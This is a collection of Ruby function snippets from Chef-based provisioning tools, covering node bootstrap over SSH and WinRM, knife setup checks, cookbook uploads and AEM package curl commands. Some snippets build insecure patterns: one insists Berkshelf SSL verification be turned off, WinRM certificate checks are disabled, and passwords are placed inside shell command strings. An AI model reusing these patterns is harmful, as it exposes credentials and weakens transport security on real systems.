"def initialSSHTasks(ssh)\n win_env_fix = %q{echo 'export PATH=\"$PATH:/cygdrive/c/opscode/chef/embedded/bin\"' > \"$HOME/chef-client\"; echo 'prev_dir=\"`pwd`\"; for __dir in /proc/registry/HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session\\ Manager/Environment;do cd \"$__dir\"; for __var in `ls * | grep -v TEMP | grep -v TMP`;do __var=`echo $__var | tr \"[a-z]\" \"[A-Z]\"`; test -z \"${!__var}\" && export $__var=\"`cat $__var`\" >/dev/null 2>&1; done; done; cd \"$prev_dir\"; /cygdrive/c/opscode/chef/bin/chef-client.bat $@' >> \"$HOME/chef-client\"; chmod 700 \"$HOME/chef-client\"; ( grep \"^alias chef-client=\" \"$HOME/.bashrc\" || echo 'alias chef-client=\"$HOME/chef-client\"' >> \"$HOME/.bashrc\" ) ; ( grep \"^alias mu-groom=\" \"$HOME/.bashrc\" || echo 'alias mu-groom=\"powershell -File \\\"c:/Program Files/Amazon/Ec2ConfigService/Scripts/UserScript.ps1\\\"\"' >> \"$HOME/.bashrc\" )}\n win_installer_check = %q{ls /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Installer/}\n lnx_installer_check = %q{ps auxww | awk '{print $11}' | egrep '(/usr/bin/yum|apt-get|dpkg)'}\n lnx_updates_check = %q{( test -f /.mu-installer-ran-updates || ! test -d /var/lib/cloud/instance ) || echo \"userdata still running\"}\n win_set_pw = nil\n\n if windows? and !@config['use_cloud_provider_windows_password']\n # This covers both the case where we have a windows password passed from a vault and where we need to use a a random Windows Admin password generated by MU::Cloud::Server.generateWindowsPassword\n pw = @groomer.getSecret(\n vault: @config['mu_name'],\n item: \"windows_credentials\",\n field: \"password\"\n )\n win_check_for_pw = %Q{powershell -Command '& {Add-Type -AssemblyName System.DirectoryServices.AccountManagement; $Creds = (New-Object System.Management.Automation.PSCredential(\"#{@config[\"windows_admin_username\"]}\", (ConvertTo-SecureString \"#{pw}\" -AsPlainText -Force)));$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine); $DS.ValidateCredentials($Creds.GetNetworkCredential().UserName, $Creds.GetNetworkCredential().password); echo $Result}'}\n win_set_pw = %Q{powershell -Command \"& {(([adsi]('WinNT://./#{@config[\"windows_admin_username\"]}, user')).psbase.invoke('SetPassword', '#{pw}'))}\"}\n end\n\n # There shouldn't be a use case where a domain joined computer goes through initialSSHTasks. Removing Active Directory specific computer rename.\n set_hostname = true\n hostname = nil\n if !@config['active_directory'].nil?\n if @config['active_directory']['node_type'] == \"domain_controller\" && @config['active_directory']['domain_controller_hostname']\n hostname = @config['active_directory']['domain_controller_hostname']\n @mu_windows_name = hostname\n set_hostname = true\n else\n # Do we have an AD specific hostname?\n hostname = @mu_windows_name\n set_hostname = true\n end\n else\n hostname = @mu_windows_name\n end\n win_check_for_hostname = %Q{powershell -Command '& {hostname}'}\n win_set_hostname = %Q{powershell -Command \"& {Rename-Computer -NewName '#{hostname}' -Force -PassThru -Restart; Restart-Computer -Force }\"}\n\n begin\n # Set our admin password first, if we need to\n if windows? and !win_set_pw.nil? and !win_check_for_pw.nil?\n output = ssh.exec!(win_check_for_pw)\n raise MU::Cloud::BootstrapTempFail, \"Got nil output from ssh session, waiting and retrying\" if output.nil?\n if !output.match(/True/)\n MU.log \"Setting Windows password for user #{@config['windows_admin_username']}\", details: ssh.exec!(win_set_pw)\n end\n end\n if windows?\n output = ssh.exec!(win_env_fix)\n output = ssh.exec!(win_installer_check)\n raise MU::Cloud::BootstrapTempFail, \"Got nil output from ssh session, waiting and retrying\" if output.nil?\n if output.match(/InProgress/)\n raise MU::Cloud::BootstrapTempFail, \"Windows Installer service is still doing something, need to wait\"\n end\n if set_hostname and !@hostname_set and @mu_windows_name\n output = ssh.exec!(win_check_for_hostname)\n raise MU::Cloud::BootstrapTempFail, \"Got nil output from ssh session, waiting and retrying\" if output.nil?\n if !output.match(/#{@mu_windows_name}/)\n MU.log \"Setting Windows hostname to #{@mu_windows_name}\", details: ssh.exec!(win_set_hostname)\n @hostname_set = true\n # Reboot from the API too, in case Windows is flailing\n if !@cloudobj.nil?\n @cloudobj.reboot\n else\n reboot\n end\n raise MU::Cloud::BootstrapTempFail, \"Set hostname in Windows, waiting for reboot\"\n end\n end\n else\n output = ssh.exec!(lnx_installer_check)\n if !output.nil? and !output.empty?\n raise MU::Cloud::BootstrapTempFail, \"Linux package manager is still doing something, need to wait (#{output})\"\n end\n if !@config['skipinitialupdates']\n output = ssh.exec!(lnx_updates_check)\n if !output.nil? and output.match(/userdata still running/)\n raise MU::Cloud::BootstrapTempFail, \"Waiting for initial userdata system updates to complete\"\n end\n end\n end\n rescue RuntimeError => e\n raise MU::Cloud::BootstrapTempFail, \"Got #{e.inspect} performing initial SSH connect tasks, will try again\"\n end\n\n end",
"def helpers; end",
"def helpers; end",
"def helpers; end",
"def run\n\n # Grab all the config params from command line, knife.rb etc\n self.config = Chef::Config.merge!(config)\n\n # Check if we have a knife.rb\n puts \"Check location of knife.rb\"\n checkfiles(:config_file,\"The config file (knife.rb) should be stored in a .chef folder here or higher (towards root)\")\n if config[:config_file].nil?\n exit 1\n else\n # We shouldn't reach this point but lets make sure we die if we somehow do.\n unless ::File.exists?(File.expand_path(config[:config_file]))\n exit 1\n end\n end\n \n puts \"Check chef basics\"\n checkparm(:chef_server_url,'chef_server_url should be set to point to your chef server (https://<server.name>/organizations/<orgname>)')\n checkfiles(:cookbook_path,\"cookbook_path should point to a valid directory\")\n\n puts \"Check author and copyright info\"\n checkparm(:cookbook_copyright,\"cookbook_copyright should be set to your company name\")\n checkparm(:cookbook_email,\"cookbook_email should be set to your eMail address\")\n\n\n puts \"Check keys exist\"\n checkfiles(:client_key,\"This file is used for authenticating to Chef server and is normally saved in .chef as client.pem\")\n checkfiles(:validation_key,\"This file is used for bootstraping new nodes and is stored in .chef as validator.pem\")\n checkparm(:validation_client_name,\"validation_client_name is normally set to <orgname>-validator\")\n\n puts \"Check proxy configuration\"\n checkparm(:http_proxy,\"http_proxy should be set to a valid proxy like http://myproxy.ge.com:3128\")\n checkparm(:https_proxy,\"https_proxy should be set to a valid proxy like http://myproxy.ge.com:3128\")\n checkparm(:bootstrap_proxy,\"bootstrap_proxy should be set to a valid proxy like http://myproxy.ge.com:3128\")\n checkparm(:no_proxy,\"no_proxy should be set to exclude certain domains like *.ge.com from being proxied. Dont add wildcard subnets like 3.*\")\n\n puts \"Check GIT/Gerrit\"\n checkparm(:reviewhost,\"reviewhost should be set to the FQDN of your Gerrit server (leave out the http:// and the port number)\")\n\n # Check if GIT has a default username configured\n result=`git config --get user.name`.chomp\n if result.length < 1\n puts ui.color(\" the git user.name is not set. Add it using:-\", :red)\n puts ui.color(\" git config --global user.name <username>\", :magenta)\n else\n puts ui.color(\" the git user.name is set to #{result}\", :green)\n end\n\n # Check if GIT has a default email address configured\n result=`git config --get user.email`.chomp\n if result.length < 1\n puts ui.color(\" the git user.email is not set. Add it using:-\", :red)\n puts ui.color(\" git config --global user.email <email address>\", :magenta)\n else\n puts ui.color(\" the git user.email is set to #{result}\", :green)\n end\n\n # Check if the git core.autocrlf is set correctly (different on Windows and OSX... TODO: Check on Linux)\n result=`git config --get core.autocrlf`.chomp\n case result\n when 'input'\n if (RUBY_PLATFORM =~ /.*darwin.*/) or (RUBY_PLATFORM =~ /.*linux.*/)\n puts ui.color(\" the git core.autocrlf is set to 'input' which is correct for OSX or Linux systems\", :green)\n end\n if (RUBY_PLATFORM =~ /.*mingw.*/) or (RUBY_PLATFORM =~ /.*cygwin.*/)\n puts ui.color(\" the git core.autocrlf is set to 'input' but Windows/Linux should use 'true' to prevent line ending problems\", :red)\n end\n\n when 'true'\n if (RUBY_PLATFORM =~ /.*mingw.*/) or (RUBY_PLATFORM =~ /.*cygwin.*/)\n puts ui.color(\" the git core.autocrlf is set to 'true' which is correct for Windows/Cygwin\", :green)\n end\n if (RUBY_PLATFORM =~ /.*darwin.*/) or (RUBY_PLATFORM =~ /.*linux.*/)\n puts ui.color(\" the git core.autocrlf is set to 'true' but OSX/Linux should use 'input' to prevent line ending problems\", :red)\n end\n\n else\n puts ui.color(\" the git core.autocrlf is set to '#{result}'\", :red)\n puts ui.color(\" the git core.autocrlf should be set to 'input' (on OSX or Linux) or 'true' (on Windows) to prevent line ending problems\", :magenta)\n end\n\n # Check if we have a git remote called Gerrit.\n result=`git config --get remote.gerrit.url`.chomp\n if result.length < 1\n puts ui.color(\" we don't seem to have a git remote called gerrit.\", :red)\n puts ui.color(\" If we are in a project folder, check you have a valid .gitreview file and try running:-\", :red)\n puts ui.color(\" git review -s\", :magenta)\n else\n puts ui.color(\" the git remote for gerrit is set to #{result}\", :green)\n end\n\n # Check we have the settings to install Vagrant box templates and create Vagrant boxes\n # TODO: Add a check to make sure the box is installed and the URL is valid\n puts \"Check Vagrant\"\n checkparm(:vagrant_box,\"vagrant_box should be set to the name of your vagrant box\")\n checkparm(:vagrant_box_url,\"vagrant_box_url should point to a downloadable vagrant box\")\n\n puts \"Check berkshelf\"\n # Do we actually have a berks config\n berksConfigFile=File.expand_path(File.join('~','.berkshelf','config.json'))\n checkfile('Berkshelf Config',berksConfigFile,\"You dont have a Berkshelf config. Try running 'berks config'\")\n\n if ::File.exists?(berksConfigFile)\n berksConfigRaw=File.read(berksConfigFile)\n berksConfig=JSON.parse(berksConfigRaw)\n\n # Make sure that SSL verify is off\n if berksConfig['ssl']['verify'].to_s == 'false'\n puts ui.color(\" SSL verify is turned off\", :green)\n else\n puts ui.color(\" SSL verify is 'true'... you should set it to 'false' to allow connecting to Chef server\", :red)\n end\n \n # Check berks is using correct Chef server URL\n if berksConfig['chef']['chef_server_url'].to_s == config[:chef_server_url]\n puts ui.color(\" Berkshelf chef_server_url is '#{berksConfig['chef']['chef_server_url']}'\", :green)\n else\n puts ui.color(\" Berkshelf chef_server_url does not match knife.rb. It's set to '#{berksConfig['chef']['chef_server_url']}'\", :red)\n end\n\n # Check berks is using correct validator.pem\n if berksConfig['chef']['validation_key_path'].to_s == File.expand_path(config[:validation_key])\n puts ui.color(\" Berkshelf validation_key_path is '#{berksConfig['chef']['validation_key_path']}'\", :green)\n else\n puts ui.color(\" Berkshelf validation_key_path does not match knife.rb. It's set to '#{berksConfig['chef']['validation_key_path']}'\", :red)\n end\n\n # Check berks is using correct client.pem\n if berksConfig['chef']['client_key'].to_s == File.expand_path(config[:client_key])\n puts ui.color(\" Berkshelf client_key is '#{berksConfig['chef']['client_key']}'\", :green)\n else\n puts ui.color(\" Berkshelf client_key does not match knife.rb. It's set to '#{berksConfig['chef']['client_key']}'\", :red)\n end\n\n puts \"Done !!!\"\n\n end\n\n end",
"def run_lamp_chef_checks\n # check that the standard unified app is responding on port 80\n run_unified_application_checks(@servers, 80)\n \n=begin \n # check that running the mysql backup script succeeds\n @servers.first.spot_check_command(\"/etc/cron.daily/mysql-dump-backup.sh\")\n \n # exercise operational RightScript(s)\n run_script(\"backup\", @servers.first)\n run_script(\"restart_apache\", @servers.first)\n \n # check that mysql tmpdir is custom setup on all servers\n query = \"show variables like 'tmpdir'\"\n query_command = \"echo -e \\\"#{query}\\\"| mysql\"\n @servers.each do |server|\n server.spot_check(query_command) { |result| raise \"Failure: tmpdir was unset#{result}\" unless result.include?(\"/mnt/mysqltmp\") }\n end\n \n # check that logrotate has mysqlslow in it\n @servers.each do |server|\n res = server.spot_check_command(\"logrotate --force -v /etc/logrotate.d/mysql-server\")\n raise \"LOGROTATE FAILURE, exited with non-zero status\" if res[:status] != 0\n raise \"DID NOT FIND mysqlslow.log in the log rotation!\" if res[:output] !~ /mysqlslow/\n end\n=end\n \n end",
"def bc_install_layout_1_chef(bc, path, barclamp)\n\n log_path = File.join '/var', 'log', 'barclamps'\n FileUtils.mkdir log_path unless File.directory? log_path\n log = File.join log_path, \"#{bc}.log\"\n system \"date >> #{log}\"\n puts \"Capturing chef install logs to #{log}\" if DEBUG\n chef = File.join path, 'chef'\n cookbooks = File.join chef, 'cookbooks'\n databags = File.join chef, 'data_bags'\n roles = File.join chef, 'roles'\n\n #upload the cookbooks\n if File.directory? cookbooks\n FileUtils.cd cookbooks\n knife_cookbook = \"knife cookbook upload -o . -a -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_cookbook + \" >> #{log} 2>&1\"\n puts \"\\t#{path} #{knife_cookbook} upload failed. Examine #{log} for more into\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_cookbook}\" if DEBUG \n else\n puts \"\\tNOTE: could not find cookbooks #{cookbooks}\" if DEBUG\n end\n \n #upload the databags\n if File.exists? databags\n Dir.entries(databags).each do |bag|\n next if bag == \".\" or bag == \"..\"\n bag_path = File.join databags, bag \n FileUtils.chmod 0755, bag_path\n chmod_dir 0644, bag_path\n FileUtils.cd bag_path\n knife_bag = \"knife data bag create #{bag} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_bag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_bag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_bag}\" if DEBUG\n\n json = Dir.entries(bag_path).find_all { |r| r.end_with?(\".json\") }\n json.each do |bag_file|\n knife_databag = \"knife data bag from file #{bag} #{bag_file} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_databag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_databag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_databag}\" if DEBUG\n end\n end\n else\n puts \"\\tNOTE: could not find databags #{databags}\" if DEBUG\n end\n\n #upload the roles\n if File.directory? roles\n FileUtils.cd roles\n Dir.entries(roles).find_all { |r| r.end_with?(\".rb\") }.each do |role|\n knife_role = \"knife role from file #{role} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_role + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_role} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_role}\" if DEBUG\n end\n else\n puts \"\\tNOTE: could not find roles #{roles}\" if DEBUG\n end\n\n puts \"Barclamp #{bc} (format v1) Chef Components Uploaded.\" \n\n end",
"def shellout_chef_client(run_list)\n sh(\"chef-client -z -o #{run_list} --force-formatter\")\nend",
"def chef_api_client\n @chef_api_client ||= begin\n require \"chef/api_client\"\n Chef::ApiClient\n end\n end",
"def bc_install_layout_1_chef(bc, path, barclamp, options={})\n options = {:debug => false}.merge! options\n debug = options[:debug] or ENV['DEBUG'] === \"true\"\n \n log_path = File.join '/var', 'log', 'barclamps'\n FileUtils.mkdir log_path unless File.directory? log_path\n log = File.join log_path, \"#{bc}.log\"\n system \"date >> #{log}\"\n puts \"DEBUG: Capturing chef install logs to #{log}\" if debug\n chef = File.join path, 'chef'\n cookbooks = File.join chef, 'cookbooks'\n databags = File.join chef, 'data_bags'\n roles = File.join chef, 'roles'\n \n #upload the cookbooks\n if File.directory? cookbooks\n FileUtils.cd cookbooks\n knife_cookbook = \"knife cookbook upload -o . -a -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_cookbook + \" >> #{log} 2>&1\"\n puts \"\\t#{path} #{knife_cookbook} upload failed. Examine #{log} for more into\"\n exit 1\n end\n puts \"DEBUG: \\texecuted: #{path} #{knife_cookbook}\" if debug \n else\n puts \"DEBUG: \\tNOTE: could not find cookbooks #{cookbooks}\" if debug\n end\n \n #upload the databags\n if File.exists? databags\n Dir.entries(databags).each do |bag|\n next if bag == \".\" or bag == \"..\"\n bag_path = File.join databags, bag \n FileUtils.chmod 0755, bag_path\n chmod_dir 0644, bag_path\n FileUtils.cd bag_path\n knife_bag = \"knife data bag create #{bag} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_bag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_bag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_bag}\" if debug\n \n json = Dir.entries(bag_path).find_all { |r| r.end_with?(\".json\") }\n json.each do |bag_file|\n knife_databag = \"knife data bag from file #{bag} #{bag_file} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_databag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_databag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"DEBUG: \\texecuted: #{path} #{knife_databag}\" if debug\n end\n end\n else\n puts \"DEBUG: \\tNOTE: could not find databags #{databags}\" if debug\n end\n \n #upload the roles\n if File.directory? roles\n FileUtils.cd roles\n Dir.entries(roles).find_all { |r| r.end_with?(\".rb\") }.each do |role|\n knife_role = \"knife role from file #{role} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_role + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_role} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"DEBUG: \\texecuted: #{path} #{knife_role}\" if debug\n end\n else\n puts \"DEBUG: \\tNOTE: could not find roles #{roles}\" if debug\n end\n \n puts \"Barclamp #{bc} (format v1) Chef Components Uploaded.\" \n \nend",
"def bootstrap\n self.class.loadChefLib\n stashHostSSLCertSecret\n splunkVaultInit\n if !@config['cleaned_chef']\n begin\n leave_ours = @config['scrub_groomer'] ? false : true\n preClean(leave_ours)\n rescue RuntimeError => e\n MU.log e.inspect, MU::ERR\n sleep 10\n retry\n end\n @config['cleaned_chef'] = true\n end\n\n _nat_ssh_key, _nat_ssh_user, _nat_ssh_host, canonical_addr, ssh_user, ssh_key_name = @server.getSSHConfig\n\n MU.log \"Bootstrapping #{@server.mu_name} (#{canonical_addr}) with knife\"\n\n run_list = [\"recipe[mu-tools::newclient]\"]\n run_list << \"mu-tools::gcloud\" if @server.cloud == \"Google\" or @server.config['cloud'] == \"Google\"\n\n json_attribs = {}\n if !@config['application_attributes'].nil?\n json_attribs['application_attributes'] = @config['application_attributes']\n json_attribs['skipinitialupdates'] = @config['skipinitialupdates']\n end\n\n# XXX this seems to break Knife Bootstrap\n# vault_access = if !@config['vault_access'].nil?\n# @config['vault_access']\n# else\n# []\n# end\n\n @server.windows? ? max_retries = 25 : max_retries = 10\n @server.windows? ? timeout = 1800 : timeout = 300\n retries = 0\n begin\n load MU.myRoot+'/modules/mu/monkey_patches/chef_knife_ssh.rb'\n if !@server.windows?\n kb = ::Chef::Knife::Bootstrap.new([canonical_addr])\n kb.config[:use_sudo] = true\n kb.name_args = \"#{canonical_addr}\"\n kb.config[:distro] = 'chef-full'\n kb.config[:ssh_user] = ssh_user\n kb.config[:ssh_verify_host_key] = :accept_new\n kb.config[:forward_agent] = ssh_user\n kb.config[:identity_file] = \"#{Etc.getpwuid(Process.uid).dir}/.ssh/#{ssh_key_name}\"\n kb.config[:ssh_identity_file] = \"#{Etc.getpwuid(Process.uid).dir}/.ssh/#{ssh_key_name}\"\n else\n kb = ::Chef::Knife::BootstrapWindowsWinrm.new([@server.mu_name])\n kb.name_args = [@server.mu_name]\n kb.config[:manual] = true\n kb.config[:winrm_transport] = :ssl\n kb.config[:winrm_port] = 5986\n kb.config[:session_timeout] = timeout\n kb.config[:operation_timeout] = timeout\n# kb.config[:bootstrap_curl_options] = \"\"\n if retries % 2 == 0\n kb.config[:host] = canonical_addr\n kb.config[:winrm_authentication_protocol] = :basic\n kb.config[:winrm_user] = @server.config['windows_admin_username']\n kb.config[:winrm_password] = @server.getWindowsAdminPassword\n else\n kb.config[:host] = @server.mu_name\n kb.config[:winrm_authentication_protocol] = :cert\n kb.config[:winrm_client_cert] = \"#{MU.mySSLDir}/#{@server.mu_name}-winrm.crt\"\n kb.config[:winrm_client_key] = \"#{MU.mySSLDir}/#{@server.mu_name}-winrm.key\"\n end\n# kb.config[:ca_trust_file] = \"#{MU.mySSLDir}/Mu_CA.pem\"\n # XXX ca_trust_file doesn't work for some reason, so we have to set the below for now\n kb.config[:winrm_ssl_verify_mode] = :verify_none\n kb.config[:msi_url] = \"https://www.chef.io/chef/download?p=windows&pv=2012&m=x86_64&v=#{MU.chefVersion}\"\n end\n\n # XXX this seems to break Knife Bootstrap\n # if vault_access.size > 0\n # v = {}\n # vault_access.each { |vault|\n # v[vault['vault']] = [] if v[vault['vault']].nil?\n # v[vault['vault']] << vault['item']\n # }\n # kb.config[:bootstrap_vault_json] = JSON.generate(v)\n # end\n\n kb.config[:json_attribs] = JSON.generate(json_attribs) if json_attribs.size > 1\n kb.config[:run_list] = run_list\n kb.config[:chef_node_name] = @server.mu_name\n kb.config[:bootstrap_product] = \"chef\"\n kb.config[:bootstrap_version] = MU.chefVersion\n kb.config[:channel] = \"stable\"\n # XXX key off of MU verbosity level\n kb.config[:log_level] = :debug\n # kb.config[:ssh_gateway] = \"#{nat_ssh_user}@#{nat_ssh_host}\" if !nat_ssh_host.nil? # Breaking bootsrap\n\n MU.log \"Knife Bootstrap settings for #{@server.mu_name} (#{canonical_addr}), timeout set to #{timeout.to_s}\", MU::NOTICE, details: kb.config\n if @server.windows? and @server.windowsRebootPending?\n raise MU::Cloud::BootstrapTempFail, \"#{@server.mu_name} has a pending reboot\"\n end\n Timeout::timeout(timeout) {\n MU::Cloud.handleNetSSHExceptions\n kb.run\n }\n # throws Net::HTTPServerException if we haven't really bootstrapped\n ::Chef::Node.load(@server.mu_name)\n rescue SystemExit, Timeout::Error, MU::Cloud::BootstrapTempFail, Net::HTTPServerException, HTTPClient::ConnectTimeoutError, WinRM::WinRMError, Net::SSH::AuthenticationFailed, Net::SSH::Disconnect, Net::SSH::ConnectionTimeout, Net::SSH::Proxy::ConnectError, Net::SSH::Exception, Errno::ECONNRESET, Errno::EHOSTUNREACH, Errno::ECONNREFUSED, Errno::EPIPE, SocketError, IOError => e\n if retries < max_retries\n retries += 1\n # Bad Chef installs are possible culprits of bootstrap failures, so\n # try scrubbing them when that happens.\n # On Windows, even a fresh install comes up screwy disturbingly\n # often, so we let it start over from scratch if needed. Except for\n # the first attempt, which usually fails due to WinRM funk.\n if !e.is_a?(MU::Cloud::BootstrapTempFail) and\n !(e.is_a?(WinRM::WinRMError) and @config['forced_preclean']) and\n !@config['forced_preclean']\n begin\n preClean(false) # it's ok for this to fail\n rescue StandardError => e\n end\n MU::Groomer::Chef.purge(@server.mu_name, nodeonly: true)\n @config['forced_preclean'] = true\n @server.reboot if @server.windows? # *sigh*\n end\n MU.log \"#{@server.mu_name}: Knife Bootstrap failed #{e.inspect}, retrying in #{(10*retries).to_s}s (#{retries} of #{max_retries})\", MU::WARN, details: e.backtrace\n sleep 10*retries\n retry\n else\n raise MuError, \"#{@server.mu_name}: Knife Bootstrap failed too many times with #{e.inspect}\"\n end\n rescue StandardError => e\nMU.log e.inspect, MU::ERR, details: e.backtrace\nsleep 10*retries\nretry\n end\n\n\n # Now that we're done, remove one-shot bootstrap recipes from the\n # node's final run list\n [\"mu-tools::newclient\"].each { |recipe|\n begin\n ::Chef::Knife.run(['node', 'run_list', 'remove', @server.mu_name, \"recipe[#{recipe}]\"], {})\n rescue SystemExit => e\n MU.log \"#{@server.mu_name}: Run list removal of recipe[#{recipe}] failed with #{e.inspect}\", MU::WARN\n end\n }\n knifeAddToRunList(\"role[mu-node]\")\n knifeAddToRunList(\"recipe[mu-tools::selinux]\")\n\n grantSecretAccess(@server.mu_name, \"windows_credentials\") if @server.windows?\n grantSecretAccess(@server.mu_name, \"ssl_cert\")\n\n saveChefMetadata\n knifeAddToRunList(\"recipe[mu-tools::updates]\") if !@config['skipinitialupdates']\n # Making sure all Windows nodes get the mu-tools::windows-client recipe\n if @server.windows?\n knifeAddToRunList(\"recipe[mu-tools::windows-client]\")\n run(purpose: \"Base Windows configuration\", update_runlist: false, max_retries: 20)\n elsif !@config['skipinitialupdates']\n run(purpose: \"Base configuration\", update_runlist: false, max_retries: 20)\n end\n ::Chef::Knife.run(['node', 'run_list', 'remove', @server.mu_name, \"recipe[mu-tools::updates]\"], {}) if !@config['skipinitialupdates']\n ::Chef::Knife.run(['node', 'run_list', 'remove', @server.mu_name, \"recipe[mu-tools::selinux]\"], {})\n\n # This will deal with Active Directory integration.\n if !@config['active_directory'].nil?\n if @config['active_directory']['domain_operation'] == \"join\"\n knifeAddToRunList(\"recipe[mu-activedirectory::domain-node]\")\n run(purpose: \"Join Active Directory\", update_runlist: false, max_retries: max_retries)\n elsif @config['active_directory']['domain_operation'] == \"create\"\n knifeAddToRunList(\"recipe[mu-activedirectory::domain]\")\n run(purpose: \"Create Active Directory Domain\", update_runlist: false, max_retries: 15)\n elsif @config['active_directory']['domain_operation'] == \"add_controller\"\n knifeAddToRunList(\"recipe[mu-activedirectory::domain-controller]\")\n run(purpose: \"Add Domain Controller to Active Directory\", update_runlist: false, max_retries: 15)\n end\n end\n\n if !@config['run_list'].nil?\n knifeAddToRunList(multiple: @config['run_list'])\n end\n\n saveDeployData\n end",
"def provision_chef_common(chef, key, chef_config, vm_config)\n # set_instance_variable(chef_config, chef, 'environment', '_default' )\n # set_instance_variable(chef_config, chef, 'version', '12.19.36' )\n properties = [\n 'attempts',\n 'enable_reporting',\n 'encrypted_data_bag_secret_key_path',\n 'environment',\n 'run_list',\n 'verbose_logging',\n 'version'\n ]\n properties.each do | property_name |\n set_instance_variable(chef_config, chef, property_name )\n end\nend",
"def define_helpers; end",
"def initialize chef_recipe\n super(chef_recipe.cookbook_name, chef_recipe.recipe_name, chef_recipe.run_context)\n\n # TODO: Support other distributions besides 'linux'\n node.default[\"serf\"][\"binary_url\"] = File.join node[\"serf\"][\"base_binary_url\"], \"#{node[\"serf\"][\"version\"]}\", \"serf_#{node[\"serf\"][\"version\"]}_linux_#{node[\"serf\"][\"arch\"]}.zip\"\n\n current_version = get_serf_installed_version\n if current_version\n Chef::Log.info \"Current Serf Version : [#{current_version}]\"\n end\n end",
"def helpers\n Blush.helpers\n end",
"def cookbook_runlist\n verify_cookbook_creation\n\n Souschef::Print.header 'Berkshelf configuration'\n Souschef::Berkshelf.new(@opts).berks_create\n Souschef::Print.header 'Configure gemfile'\n Souschef::Gemfile.new(@opts).write\n Souschef::Print.header 'Create essential template files'\n Souschef::Template.run(@opts)\n # Mock Scaffold to generate default recipe and tests\n\n Souschef::Print.header 'Create default recipe and tests'\n Souschef::Scaffold.new(path: @opts[:path],\n recipe: 'default',\n profile: @opts[:profile],\n force: true,\n verbose: @opts[:verbose]).start\n\n Souschef::Print.header 'Testkitchen configuration'\n Souschef::Testkitchen.new(@opts).setup\n\n Souschef::Print.header \"Don't forget to run bundle install!\"\n end",
"def load_cloudflare_cookbook_gems\n return if defined? @@cloudflare_cookbook_gems_loaded\n chef_gem 'cloudflare' do\n action :install\n version '2.0.1'\n end\n require 'resolv'\n require 'cloudflare'\n @@cloudflare_cookbook_gems_loaded = true\nend",
"def chef_client_command\n \"chef-client\"\n end",
"def mounted_helpers; end",
"def generate_chef_config()\n Kitchenplan::Log.info 'Generating the Chef configs'\n #$: << File.join((File.expand_path(\"../\", Pathname.new(__FILE__).realpath)), \"/lib\")\n File.open(\"kitchenplan-attributes.json\", 'w') do |out|\n\tout.write(::JSON.pretty_generate(self.config['attributes']))\n end\n File.open(\"solo.rb\", 'w') do |out|\n\tout.write(\"cookbook_path [ \\\"#{Dir.pwd}/cookbooks\\\" ]\")\n end\n end",
"def chef_credentials\n creds = Hash.new\n File.open(ENV['HOME'] + '/.chef/knife.rb').each do |line|\n creds['c_uri'] = line.scan(/'([^']*)'/).join(' ') if line.match('chef_server_url')\n creds['c_key'] = line.scan(/'([^']*)'/).join(' ') if line.match('client_key')\n creds['c_node'] = line.scan(/'([^']*)'/).join(' ') if line.match('node_name')\n end\n return creds\nrescue => e\n puts '(chef=>tenant_prov): Unable to access Chef credentials. Check the knife.rb file for the user environment.'\n puts \"(chef=>tenant_prov): Error: #{e}\"\n exit\nend",
"def set_vars\n #Set up vars with AEM package manager urls, etc.\n vars = {}\n vars[:recursive] = new_resource.recursive ? '\\\\&recursive=true' : \"\"\n vars[:file_name] = \"#{new_resource.name}-#{new_resource.version}\" +\n \"#{new_resource.file_extension}\"\n vars[:download_url] = new_resource.package_url\n vars[:file_path] = \"#{Chef::Config[:file_cache_path]}/#{vars[:file_name]}\"\n vars[:user] = new_resource.user\n vars[:password] = new_resource.password\n vars[:port] = new_resource.port\n vars[:group_id] = new_resource.group_id\n vars[:upload_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -F\" +\n \" package=@#{vars[:file_path]} http://localhost:\" +\n \"#{vars[:port]}/crx/packmgr/service/.json?cmd=upload\"\n vars[:delete_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=delete\"\n vars[:install_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=install#{vars[:recursive]}\"\n vars[:activate_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=replicate\"\n vars[:uninstall_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=uninstall\"\n\n vars\nend",
